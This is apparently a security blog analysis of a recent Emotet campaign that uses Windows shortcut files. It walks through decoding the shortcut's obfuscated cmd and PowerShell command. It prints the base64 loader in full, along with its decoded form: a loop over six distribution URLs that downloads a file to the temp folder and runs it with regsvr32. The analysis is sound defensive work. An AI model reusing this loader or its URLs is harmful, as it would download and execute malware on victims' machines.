By Alexandre Siviero - Emotet is a trojan spread predominantly via fraudulent (malspam) email. The infection can arrive via malicious script, macro-enabled document files or malicious link. Emails with Emotet may contain familiar promotions designed in such a way that they look like a legitimate email.
It was possible to get a sample of the Emotet using the Triage website.
The focus of this report is not to explain in detail how Emotet works, but rather a way to identify and decode the most recent payload version that disseminates it. However, we will provide throughout the report the names of functions and modules involved in its creation, along with references that the reader can refer to if they wish to dig deeper into the subject.
Order of de-fuscation
The sample extracted from Triage is shown below.
Unlike past campaigns spreading this malware family, this is not an Office document with malicious macros. The current campaign uses Windows shortcut files (.lnk extension), just like the example above.
To begin the analysis we inspect the properties of the shortcut in question:
In the target field we notice something unusual for files of this nature, the presence of a Powershell command to decode strings in base64. Unfortunately the content of this shortcut target is too long for the file's properties window.
To get around this we use the HxD tool, which allows you to view the contents of any file in hexadecimal. In the following image you can see part of the string encoded in base64.
As it is humanly impossible to understand this type of string, with the help of the cyberchef tool, it was possible to decode the String, finding the following code:
After translation, you can see some of the code contained in the file. You notice the path \Windows\system32\cmd.exe, followed by a powershell invocation (obfuscated as p.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l...e.^.x.^.e) and the base64 string .
c.m.d....e.x.e.............\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d....e.x. e.i./.v.:.o.n. ./.c.
.D.u.X.P.q.w.j.y.n.h.P.K.5.p.0.T.Y.c.a.C.f.4.G.k.A.t.B.W.l.J.m.P.l.w.q.d.5.q.s.n
.f.H.o.5.m.V.y.k.N.t.c.g.e.W.N.2.k.Q.L.m.a.c.K.q.V.A.R.F.E.g.F.V.|.|.g.o.t.o.&.p
.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.^.e. .-.c. .".&.{. .i.e.x.
.(..s.t.r.i.n.g.].[.S.y.s.t.e.m...T.e.x.t...E.n.c.o.d.i.n.g.]:.:.A.S.C.I.I...G
.e.t.S.t.r.i.n.g.(.[.S.y.s.t.e.m...C.o.n.v.e.r.t.]:.:.F.r.o.m.B.a.s.e.6.4.S.t.r
.i.n.g.(.'.J.F.B.y.b.2.d.y.Z.X.N.z.U.H.J.l.Z.m.V.y.Z.W.5.j.Z.T.0.i.U.2.l.s.Z.W.5
.0.b.H.l.D.b.2.5.0.a.W.5.1.Z.S.I.7.J.G.x.p.b.m.t.z.P.S.g.i.a.H.R.0.c.D.o.v.L.2.h
.v.M.j.g.w.M.z.E.5.M.D.A.x.L.m.h.v.Z.2.l.i.b.y.5.u.Z.X.Q.v.a.W.5.j.b.H.V.k.Z.S.9
.0.Z.1.F.3.e.G.l.j.N.F.F.3.d.U.0.v.I.i.w.i.a.H.R.0.c.D.o.v.L.3.d.3.d.y.5.n.Z.X.J
.v.b.n.R.v.Z.2.V.y.a.W.F.0.c.m.l.h.L.m.9.y.Z.y.9.0.b.X.A.v.Y.0.I.2.Y.2.d.U.V.m.Z
.5.e.V.o.z.Y.j.F.3.O.W.Q.v.I.i.w.i.a.H.R.0.c.D.o.v.L.2.N.s.d.W.J.t.Y.W.5.h.Z.2.V
.y.L.m.5.l.d.C.5.h.c.i.9.w.c.n.V.l.Y.m.E.v.V.k.5.x.c.3.g.z.N.j.h.G.S.H.F.L.S.y.8
.i.L.C.J.o.d.H.R.w.O.i.8.v.b.X.l.t.a.W.N.y.b.2.d.y.Z.W.V.u.L.m.1.p.Z.2.h.0.Y.2.9
.k.Z.S.5.j.b.2.0.v.R.m.9.4.L.U.M.v.b.m.h.N.W.X.d.r.R.l.h.C.L.y.I.s.I.m.h.0.d.H.A
.6.L.y.9.0.b.3.d.h.c.m.R.z.d.W.4.u.b.m.V.0.L.2.F.k.b.W.l.u.L.z.h.O.V.z.J.U.S.m.V
.Q.c.z.h.k.W.m.h.i.L.y.I.s.I.m.h.0.d.H.A.6.L.y.9.o.a.3.d.p.b.m.R.z.Y.W.N.h.Z.G.V
.t.e.S.5.z.e.W.5.v.b.G.9.n.e.S.5.t.Z.S.9.A.Z.W.F.E.a.X.I.v.c.U.g.y.R.U.h.1.d.l.l
.W.b.0.p.F.S.j.I.v.I.i.k.7.Z.m.9.y.Z.W.F.j.a.C.A.o.J.H.U.g.a.W.4.g.J.G.x.p.b.m.t
.z.K.S.B.7.d.H.J.5.I.H.t.J.V.1.I.g.J.H.U.g.L.U.9.1.d.E.Z.p.b.G.U.g.J.G.V.u.d.j.p
.U.R.U.1.Q.L.0.R.3.R.V.h.y.Y.2.d.O.W.G.o.u.U.X.l.V.O.1.J.l.Z.3.N.2.c.j.M.y.L.m.V
.4.Z.S.A.k.Z.W.5.2.O.l.R.F.T.V.A.v.R.H.d.F.W.H.J.j.Z.0.5.Y.a.i.5.R.e.V.U.7.Y.n.J
.l.Y.W.t.9.I.G.N.h.d.G.N.o.I.H.s.g.f.X.0.=.').)). .}.
When trying to translate base64, we observed that the dots between characters are a storage feature of strings in UTF16-LE (each character is separated by a null byte, which is translated as "."). To make it easier to read, we use a simple python script to remove the unnecessary dots:
string = [UNICODE STRING]
unistring = ""
for i in range(0, (len(string)-1)): if i == 0:
unistring += string[i] i+=1
if string[i-1] == ".":
if string[i-2] == "." and string[i] == ".": pass
else:
unistring += string[i] i+=1
print(unistring)
Returning the following result:
"C:\Windows system32\cmd.exe" /v:on /c DuXPqwjynhPK5p0TYcaCf4GkAtBWlJmPlwqd5qsnfHo5mVykNtcgeWN2kQLmacKqVARFEgFV|goto&p
^o^w^e^r^s^h^e^l^l.e^x^e -c “&{ iex ([string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64Str ing(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2h vMjgwMzE5MDAxLmhvZ2liby5uZXQvaW5jbHVkZS90Z1F3eGljNFF3dU0vIiwiaHR0cDovL3d3dy5nZXJ vbnRvZ2VyaWF0cmlhLm9yZy90bXAvY0I2Y2dUVmZ5eVozYjF3OWQvIiwiaHR0cDovL2NsdWJtYW5hZ2V yLm5ldC5hci9wcnVlYmEvVk5xc3gzNjhGSHFLSy8iLCJodHRwOi8vbXltaWNyb2dyZWVuLm1pZ2h0Y29 kZS5jb20vRm94LUMvbmhNWXdrRlhCLyIsImh0dHA6Ly90b3dhcmRzdW4ubmV0L2FkbWluLzhOVzJUSmV QczhkWmhiLyIsImh0dHA6Ly9oa3dpbmRzYWNhZGVteS5zeW5vbG9neS5tZS9AZWFEaXIvcUgyRUh1dll Wb0pFSjIvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjp URU1QL0R3RVhyY2dOWGouUXlVO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvRHdFWHJjZ05Yai5ReVU7YnJ lYWt9IGNhdGNoIHsgfX0=’))) }”
With the help of the cyberchef tool it is possible to decode the above string . We can finally get a clear read on the attacker's intentions:
$ProgressPreference="SilentlyContinue";
$links=(“http://ho280319001.hogibo.net/include/tgQwxic4QwuM/“, “http://www.gerontogeriatria.org/tmp/cB6cgTVfyyZ3b1w9d/“, “http://clubmanager.net.ar/prueba/VNqsx368FHqKK/“, “http://mymicrogreen.mightcode.com/Fox-C/nhMYwkFXB/“, “http://towardsun.net/admin/8NW2TJePs8dZhb/“, “http://hkwindsacademy.synology.me/@eaDir/qH2EHuvYVoJEJ2/“); for each ($u in $links) {
try {
IWR $u -OutFile $env:TEMP/DwEXrcgNXj.QyU; Regsvr32.exe $env:TEMP/DwEXrcgNXj.QyU;break
}
catch { }
}
The above code has six URLs, contained in a variable named links. The loop then attempts to access one of these addresses, download its contents to the temporary folder (env:TEMP/DwEXrcgNXj.QyU) and execute it via the regsvr32.exe application (used for DLL execution). If this attempt is successful, the loop is terminated. The idea behind this code is to provide alternative sources for the final payload . If any of the addresses are unavailable, the algorithm tries the same procedure for the next one in the list.
Recommendations
We are all targets of Emotet. To date, Emotet has targeted individuals, businesses, and government entities around the world, stealing banking logins, financial data, and even bitcoin wallets.
One can highlight an Emotet attack on the city of Allentown, PA, which required the direct assistance of Microsoft's incident response team to perform the cleanup and entailed a repair cost of over $1 million for the city.
Now that Emotet is being used to download and spread other banking Trojans, the target list could be even wider. Early versions of Emotet were used to attack banking customers in Germany. Later versions of Emotet targeted organizations in Canada, the United Kingdom, and the United States. The campaigns seen in 2022 have a worldwide focus, an example where the subject line was "buona pasqua, happy easter" but attached to the email was a malicious XLS file to spread and "install" Emotet.
References
- https://pt.malwarebytes.com/emotet/
- https://www.checkpoint.com/press/2022/february-2022s-most-wanted-malware-emotet-remains- number-one-while-trickbot-slips-even-further-down-the-index/
- https://www.youtube.com/watch?v=-W4yZifokx0
- https://canaltech.com.br/seguranca/governo-do-japao-lanca-ferramenta-que-detecta-nova-versao- do-malware-emotet-215176/